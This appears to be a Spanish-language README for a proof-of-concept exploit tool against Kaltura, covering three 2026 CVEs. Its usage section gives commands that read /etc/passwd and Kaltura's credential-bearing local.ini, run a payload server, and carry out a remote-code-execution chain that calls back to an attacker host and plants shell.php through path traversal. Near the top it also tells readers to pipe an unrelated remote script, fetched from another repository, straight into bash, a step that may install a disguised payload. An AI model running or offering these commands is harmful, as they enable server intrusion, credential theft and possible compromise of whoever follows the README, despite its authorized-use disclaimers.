
Explotaciones de prueba de concepto para CVE-2026-19912, CVE-2026-19913 y CVE-2026-19914, que demuestran lectura de archivos y ejecución remota de código en Kaltura, destinadas a pruebas de seguridad autorizadas y fines educativos.
Ejecuta la última versión del script de descarga externa directamente desde GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Este comando requiere Bash y
curl. Revisa el script remoto antes de ejecutarlo si no confías en la fuente.
Usa este proyecto solo en entornos seguros y autorizados, como:
Configuración de ejemplo:
git clone <repository-url>
cd <repository-name>
# El proyecto usa Python, sigue los pasos a continuación
# Crea un entorno virtual
python -m venv venv
# Activa el entorno virtual
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Instala los requisitos
pip install -r requirements.txt
Ejemplo de uso:
# 1. Lectura de archivos (la más fiable, funciona como se describe en el artículo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Solo el servidor de payloads (úsalo con Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888
# 3. Esqueleto de la cadena completa
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.
Este repositorio es solo para investigación de seguridad educativa y autorizada.
Está diseñado para ayudar a los usuarios a aprender sobre:
Usa este repositorio solo en entornos donde tengas permiso, como:
El uso no autorizado o ilegal está estrictamente prohibido.
El autor y los colaboradores no son responsables de ningún daño, uso indebido, problema legal o pérdida causada por este proyecto.
Al usar este repositorio, aceptas que:
Este proyecto está destinado a:
Por favor, sigue las prácticas de divulgación responsable y cumple con todas las leyes aplicables.
Para divulgación responsable o colaboración, contacta al mantenedor del repositorio a través de GitHub.
Explora la Colección de PoC CVE para obtener recursos adicionales de pruebas de concepto de CVE destinados a investigación y educación de seguridad autorizada.